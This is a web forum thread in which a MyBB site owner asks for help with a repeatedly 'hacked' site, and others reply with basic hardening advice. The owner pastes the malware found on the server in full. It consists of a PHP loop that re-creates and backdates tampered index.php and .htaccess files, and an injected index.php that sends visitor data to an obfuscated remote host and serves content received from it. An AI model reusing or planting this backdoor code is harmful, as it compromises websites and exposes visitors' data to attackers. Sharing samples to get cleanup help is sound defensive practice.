what exactly do you mean by “hacked” ?

the only vulnerabilities might be in the php files if you use a deprecated version of php, but the chances are very low.

I think that :
- either you have extra code from a dubious source (counters, for example).
- or they have your ftp password.

Anyway , version 12 is more vulnerable.

Have you changed the ftp password yet ?
Do you have extra codes ?
Do you use ftps to transfer the site to the host ?

Explain well what you mean by “hacked”.

Looks like you are using MyBB for your forums.  You might see if they have an upgrade.  Your hosting provider should offer the ability to block IP's.  Most likely the are coming from a short list of IP's.

Yes, I use MyBB, but I thinks is not there. Yestarday I deactivated the Plugins, and is the same. every time i delete this 3 files, before sime time, they reapear, and my index, put witl ".old", like the print. I can share the files, they dont have virus, but someone can see what they mess.

have you reset and change ftp password ?

what version of MyBB ?

what version of php ?

I reset the ftp pass , like 5 times.

My version of MyBB is the last 1.38.

php version I can see in cpanel 7.3 (current)

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

I will consider in the nex update of MyBB, but I think is not from there.

This is the code appear;

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in new index.php

This is the change

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

OK, I think I configure the problem.
I made a search in file I.php and get some results relating with facebook. I have a code and plugin in my index, so I removed. lets see if they appear again. Hope not ;)

Amigo, problema está em seu servidor. Se for conta única, pode ter tido o FTP invadido e infiltrado algum código maligno. Maioria das vezes é invadido por ser uma hospedagem compartilhada! Cobre sua empresa responsável pela hospedagem! 

The problem is not the facebook plugin. I will try make a fresh MyBB install and see if the problem maintain.

I will give news.